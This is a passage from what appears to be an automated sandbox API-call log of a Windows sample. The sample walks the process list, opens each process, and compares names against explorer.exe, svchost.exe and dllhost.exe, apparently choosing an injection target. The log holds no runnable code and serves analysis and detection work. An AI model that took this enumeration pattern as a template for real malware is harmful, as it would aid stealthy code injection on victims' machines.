lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0257.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0257.718] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0257.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0257.719] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0257.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0257.719] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0257.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0257.720] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0257.720] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0257.721] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0257.721] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0257.722] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0257.722] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0257.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0257.723] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0257.723] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0257.724] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0257.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0257.724] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.724] CloseHandle (hObject=0xd8) returned 1 [0257.724] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0257.724] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0257.724] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0257.724] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0257.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0257.725] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0257.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0257.725] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.725] CloseHandle (hObject=0xd8) returned 1 [0257.725] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0257.725] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0257.725] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0257.725] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0257.726] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0257.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0257.726] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0257.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0257.727] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.727] CloseHandle (hObject=0xd8) returned 1 [0257.727] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0257.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0257.727] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.727] CloseHandle (hObject=0xd8) returned 1 [0257.728] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0257.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0257.728] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.728] CloseHandle (hObject=0xd8) returned 1 [0257.728] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0257.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0257.729] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.729] CloseHandle (hObject=0xd8) returned 1 [0257.729] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0257.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0257.729] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.729] CloseHandle (hObject=0xd8) returned 1 [0257.729] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0257.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0257.730] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.730] CloseHandle (hObject=0xd8) returned 1 [0257.730] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0257.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0257.730] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.730] CloseHandle (hObject=0xd8) returned 1 [0257.730] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0257.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0257.731] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.731] CloseHandle (hObject=0xd8) returned 1 [0257.731] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0257.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0257.732] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.732] CloseHandle (hObject=0xd8) returned 1 [0257.732] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0257.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0257.732] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.732] CloseHandle (hObject=0xd8) returned 1 [0257.732] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0257.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0257.733] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.733] CloseHandle (hObject=0xd8) returned 1 [0257.733] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0257.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0257.733] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.733] CloseHandle (hObject=0xd8) returned 1 [0257.733] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0257.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0257.734] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.734] CloseHandle (hObject=0xd8) returned 1 [0257.734] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0257.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0257.734] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.734] CloseHandle (hObject=0xd8) returned 1 [0257.734] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0257.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0257.735] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.735] CloseHandle (hObject=0xd8) returned 1 [0257.735] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0257.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0257.736] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.736] CloseHandle (hObject=0xd8) returned 1 [0257.736] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0257.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0257.736] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.736] CloseHandle (hObject=0xd8) returned 1 [0257.736] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0257.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0257.737] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.737] CloseHandle (hObject=0xd8) returned 1 [0257.737] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0257.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0257.737] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.737] CloseHandle (hObject=0xd8) returned 1 [0257.737] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0257.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0257.738] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.738] CloseHandle (hObject=0xd8) returned 1 [0257.738] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0257.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0257.739] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.739] CloseHandle (hObject=0xd8) returned 1 [0257.739] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0257.739] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0257.740] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0257.740] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0257.740] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0257.741] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0257.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0257.741] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.741] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0257.742] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.742] CloseHandle (hObject=0xd8) returned 1 [0257.742] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0257.742] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0257.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0257.742] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.742] CloseHandle (hObject=0xd8) returned 1 [0257.742] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0257.742] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0257.742] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0257.742] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0257.743] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.743] CloseHandle (hObject=0xd8) returned 1 [0257.743] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0257.743] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.743] CloseHandle (hObject=0xd8) returned 1 [0257.743] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0257.743] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0257.744] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0257.744] CloseHandle (hObject=0xd8) returned 1 [0257.744] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.745] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0257.745] CloseHandle (hObject=0xd4) returned 1 [0257.745] Sleep (dwMilliseconds=0x3e8) [0258.774] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0258.776] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0258.776] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 